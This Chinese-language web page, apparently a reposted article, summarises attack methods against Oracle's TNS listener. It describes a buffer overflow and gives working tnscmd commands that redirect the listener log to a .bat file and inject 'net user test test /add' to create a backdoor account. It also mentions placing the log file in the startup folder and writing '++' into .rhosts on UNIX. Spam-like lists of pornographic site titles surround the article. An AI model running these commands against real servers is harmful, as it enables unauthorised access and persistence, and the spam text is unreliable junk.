a亚洲精品_精品国产91乱码一区二区三区_亚洲精品在线免费观看视频_欧美日韩亚洲国产综合_久久久久久久久久久成人_在线区

首頁 > 數據庫 > Oracle > 正文

針對Oracle的TNS listener攻擊方法整理

2024-08-29 13:53:14
字體:
來源:轉載
供稿:網友

首先,根據版本的不同,TNS listener可能較易受到多種類型的緩沖區溢出攻擊,這些攻擊可以在不提供用戶ID和口令的情況下被利用。例如:在Oracle 9i中,當客戶機請求某個過長的service_name時,很容易受到溢出攻擊。當listener為日志構建錯誤消息之后,service_name的值會被復制到某于棧結構的緩沖區內,從而引起溢出—覆蓋保存值將返回棧中的地址。這種做法可以使攻擊者獲得控制權。事實上,TNS listener曾經有過多次溢出和格式化字符串的漏洞。

其次,另一類攻擊和日志文件有關。只有當未給listener設置口令的時候,攻擊才會有效。

假設某個listener沒有設置口令,攻擊方法如下:

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRipTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c://)))” 將日志目錄設置到C盤

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))” 將日志文件設置為test.bat


tnscmd -h www.example.com –rawcmd “(CONNECT_DATA=(( ||dir >test.txt||net user test test /add))”該命令把

dir >test.txt、net user test test /add命令寫入c:/test.bat文件,由于雙豎線的作用(第一條命令執行失敗后,WINDOWS命令解釋器執行后面的命令)把錯誤的信息注釋掉, 從而可以執行我們提交的命令。

通過設置日志文件到不同的目錄,例如WINDOWS的啟動目錄,當服務器重啟將執行惡意用戶提交的特定代碼,從而對系統造成威脅。


運行于UNIX系統上的oracle也會受到同樣的威脅。其中一種方法就是將“++”回送給.rhost文件,當系統運行時,使用r*services命令。


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 亚洲精品久久久久久久久久久久久 | 有码在线 | 日韩久久综合 | 在线免费观看黄色 | 黄色a在线观看 | 嫩草久久 | 日本成人一区二区三区 | av观看免费 | 99精品网 | 成年无码av片在线 | 欧美精品二区三区四区免费看视频 | 成人激情视频 | 国产一级免费视频 | 欧美午夜视频 | 欧美精品三区 | 久久国产一区二区三区 | 色精品| 精品久久久久久国产 | 欧美精品一区二区视频 | 男女啪啪免费网站 | 四虎影视免费观看 | 超碰人人爽 | 精品一区二区在线观看 | 蜜桃精品久久久久久久免费影院 | 国产伦精品一区二区三区不卡视频 | 国产一区二区av | 国产精品一卡二卡三卡 | 亚洲精品免费视频 | 午夜久久久 | xxx在线观看 | 黄色毛片在线播放 | 污网站在线免费看 | 欧美一级二级在线观看 | 四虎影院免费网址 | 国产成人久久精品77777 | 免费观看毛片 | 中文字幕 国产 | 亚洲最大av网站 | 国产精品美女久久久久久久久久久 | 欧美日韩久久 | 天堂一区二区三区 |